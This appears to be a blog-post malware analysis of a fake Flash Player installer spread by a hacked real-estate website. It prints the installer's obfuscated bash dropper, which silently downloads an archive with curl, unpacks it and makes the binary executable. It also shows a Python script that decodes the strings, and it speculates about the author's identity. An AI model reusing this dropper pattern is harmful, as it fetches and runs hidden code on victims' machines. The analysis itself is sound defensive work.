In this article, I will walk you through malware analysis distributed by a hacked website.

I was searching for a new place to live in LA on Zillow and found an interesting location. The contact for it was Jesse Weinberg from Keller Williams Silicon Beach.

I googled this guy and the first result was In fact, this is the website they list on their Facebook.

If you click on Search For Properties in Your Area in Chrome, you will be redirected to a Flash download page that automatically downloads Adobe Flash Player.dmg.


I used to convert .dmg into a .zip to avoid autoruns.

After unzipping the file, I saw the usual contents of a dmg archive; however, the install script was just a bash script:

With the following content:


# Download URL: the filename is hidden behind two layers of base64 (it decodes to mmStub.tar.gz)
# and a timestamp is appended as a cache-buster.
dlUrl="http://${dlDomain}/${dlPath}/$(echo "YlcxVGRIVmlMblJoY2k1bmVnbz0K" | openssl base64 -d -A | openssl base64 -d -A)?ts=$(date +%s)"
# Path of the executable inside the extracted bundle, obfuscated the same way.
binPath="${dir}/$(echo "YlcwdGFXNXpkR0ZzYkMxdFlXTnZjeTVoY0hBdlEyOXVkR1Z1ZEhNdlRXRmpUMU12YlcwdGFXNXpkR0ZzYkMxdFlXTnZjd289Cg==" | openssl base64 -d -A | openssl base64 -d -A)"
# Start from a clean working directory.
rm -rf "${dir}"
mkdir -p "${dir}"
# Fetch the archive silently, following redirects, and unpack it.
curl -s -L -o "${dir}/stmp.tar.gz" "${dlUrl}"
tar -xvzf "${dir}/stmp.tar.gz" -C "${dir}"
# Make the dropped binary executable.
chmod +x "${binPath}"

Essentially what this does is:

  1. Download the archive
  2. Extract it
  3. Execute the binary

These are the contents of mmStub.tar.gz:

After checking the binary with IDA Pro, I see that it was written in Objective-C, which is both a tip and a pain in the ass. The tip lies in the fact that some of the class names can be deobfuscated easily. The pain in the ass is tracking the X-Refs through the Objective-C messaging system: following an execution flow is tricky.


I see there are some obfuscated strings. It appears that the author didn't try to obfuscate the program's code, but instead obfuscated the C2C URLs. As I mentioned above, we can see class names, and luckily there is a class specifically for encrypting and decrypting strings. Below is a screenshot of a function that decrypts a single byte, and wait for it.... it's a Vigenere cipher. Lol.
Looking for the key doesn't take long either. If you stare a little at the assembly it will come to you.
The class is being initialized with the key 1522855729. I threw together a simple Python script and went on decrypting. You can see it here.
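To make the two deobfuscation steps above concrete, here is an added Python example (not the script from the original post): it undoes the double base64 used in the install script and decrypts strings with the key 1522855729. The per-byte shift, the sample ciphertext and the `decrypt_c2_string` name are my assumptions; the page only confirms the cipher is Vigenere and the key value.

```python
import base64

# Values taken from the analysis above.
KEY = "1522855729"                          # key the string-decryptor class is initialised with
STMP_B64 = "YlcxVGRIVmlMblJoY2k1bmVnbz0K"    # double base64-encoded archive name from the dropper


def decode_dropper_string(s: str) -> str:
    """Undo the two `openssl base64 -d -A` layers from the install script.
    The trailing newline embedded in the encoded data is stripped."""
    return base64.b64decode(base64.b64decode(s)).decode().rstrip("\n")


def vigenere_bytes(data: bytes, key: str, decrypt: bool) -> bytes:
    """Byte-wise Vigenere: shift each byte by the ASCII value of the cycled key
    character, mod 256. ASSUMPTION: the sample's single-byte routine uses this
    classic shift; the page only states it is Vigenere with this key."""
    kb = key.encode()
    out = bytearray()
    for i, b in enumerate(data):
        k = kb[i % len(kb)]
        out.append((b - k) % 256 if decrypt else (b + k) % 256)
    return bytes(out)


def decrypt_c2_string(blob: bytes, key: str = KEY) -> str:
    """Decrypt one obfuscated string as the malware's decryptor class would."""
    return vigenere_bytes(blob, key, decrypt=True).decode("utf-8", errors="replace")


if __name__ == "__main__":
    print(decode_dropper_string(STMP_B64))          # mmStub.tar.gz
    # Constructed sample: obfuscate a placeholder path, then recover it.
    sample = vigenere_bytes(b"/example/payload", KEY, decrypt=False)
    print(sample.hex())
    print(decrypt_c2_string(sample))                # /example/payload
```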


The malware's C2C lives on subdomains of For example, the actual useful payload can be found at
Which does nothing else but its adware stuff:
Nothing interesting.

Looking at the strings one more time in the 2nd stage shows us this:

The only guy with this username on the internet is this one:

Maybe just a bad coincidence, but my bet is it's bad opsec, just like his malware.